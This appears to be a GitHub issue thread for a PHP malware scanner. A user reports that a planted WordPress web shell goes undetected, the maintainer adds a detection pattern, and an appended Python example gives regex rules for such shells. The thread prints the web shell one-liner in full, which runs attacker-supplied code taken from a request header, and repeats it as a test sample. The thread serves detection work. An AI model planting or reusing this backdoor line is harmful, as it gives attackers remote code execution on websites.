scr34m / php-malware-scanner

Scans PHP files for malwares and known threats
GNU General Public License v3.0
556 stars 96 forks

Does not recognize malware with PHP script #72

Closed paulijmker closed 2 years ago

paulijmker commented 2 years ago

I got the scanner running via PHP. I have added a file called "cyb3rsh3ll.php" in the theme folder of WordPress. Inside the PHP code:

<?$x=explode('~',base64_decode(substr(numberheaders()['x'],1)));@$x[0]($x[1]);

This already looks like malware, but when I run the test I get no error message, just OK???

My full script:

$scan = new MalwareScanner();
$scan->setExtensions(array('.php', '.js'));
$scan->addWordpressChecksums('5.9.2');
$scan->setFlagHideWhitelist(true);
$scan->setFlagHideOk(true);
$scan->setFlagCombinedWhitelist(true);
$scan->run(ABSPATH);

Also I see that the script with the above code is executed twice: a full printout with all results and a printout with only the ER results. How do I solve this?

result:

... (loading all the OK and ER descriptions)
# OK # {/home/domain/domains/domain.nl/public_html/xmlrpc.php}
# OK # {/home/domain/domains/domain.nl/public_html/wp-comments-post.php}
# OK # {/home/domain/domains/domain.nl/public_html/wp-links-opml.php}
# OK # {/home/domain/domains/domain.nl/public_html/wp-config.php}
Start time: 2022-03-24 15:36:48
End time: 2022-03-24 15:36:54
Total execution time: 6
Base directory: /home/domain/domains/domain.nl/public_html
Total directories scanned: 614
Total files scanned: 2092
Total malware identified: 3
Combined whitelist records count: 88134

# ER # {/home/domain/domains/domain.nl/public_html/wp-content/plugins/seo-by-rank-math/assets/vendor/select2/select2.min.js}
# ER # {/home/domain/domains/domain.nl/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-htaccess.php}
Start time: 2022-03-24 15:36:57
End time: 2022-03-24 15:37:01
Total execution time: 4
Base directory: /home/domain/domains/domain.nl/public_html/
Total directories scanned: 1228
Total files scanned: 4826
Total malware identified: 5

scr34m commented 2 years ago

The code part @$x[0]($x[1]); looks really odd, will add a pattern for it.

What is your script name? Maybe this causes some interference, but will look into this issue too shortly.
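A detection rule for the call shape scr34m points out above, written here as an added example in Python rather than as one of php-malware-scanner's own definitions; the rule names and both sample files are constructed for the illustration, and the only real input is the one-liner quoted in the issue:

```python
import re

# Added example (not php-malware-scanner code): a small rule-based check for
# the trait in the reported one-liner, the dynamic call @$x[0]($x[1]);
# where callee and argument both come from one array built at runtime.
# Such a line names no function directly, so keyword lists such as
# "eval(" or "system(" never fire; the shape of the call is the signal.

RULES = {
    # $var[<int>]($var[<int>]) with an optional @ silencer -> high risk
    "dynamic_array_call": re.compile(
        r"@?\$[A-Za-z_]\w*\s*\[\s*\d+\s*\]\s*\(\s*\$[A-Za-z_]\w*\s*\[\s*\d+\s*\]\s*\)"),
    # base64_decode() output split into pieces: the usual way to build the
    # array that feeds the call above (base64_decode alone is too common)
    "base64_explode": re.compile(
        r"explode\s*\([^;]*base64_decode\s*\(", re.IGNORECASE),
    # short open tag "<?$" glued straight to code, typical of dropped files
    "short_open_tag": re.compile(r"<\?\$"),
}


def scan_source(src: str) -> list:
    """Return the names of the rules that match the given PHP source."""
    return [name for name, rx in RULES.items() if rx.search(src)]


def verdict(src: str) -> str:
    """'ER' when the dynamic array call is present, 'OK' otherwise,
    mirroring the two result labels in the scanner output quoted above."""
    return "ER" if "dynamic_array_call" in scan_source(src) else "OK"


# Constructed samples: the one-liner quoted in this issue, and a benign
# theme snippet that also calls explode() on user-controlled data.
MALICIOUS = ("<?$x=explode('~',base64_decode(substr(numberheaders()['x'],1)));"
             "@$x[0]($x[1]);")
BENIGN = "<?php\n$parts = explode('~', $input);\necho htmlspecialchars($parts[0]);\n"

if __name__ == "__main__":
    for label, src in (("cyb3rsh3ll.php", MALICIOUS), ("theme.php", BENIGN)):
        print(f"# {verdict(src)} # {{{label}}} {scan_source(src)}")
```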

scr34m commented 2 years ago

You have to specify the false flag to tell it that it is not in CLI mode, e.g.: $scan = new MalwareScanner(false);

scr34m commented 2 years ago

Definitions updated.

paulijmker commented 2 years ago

Thank you, it's working now!!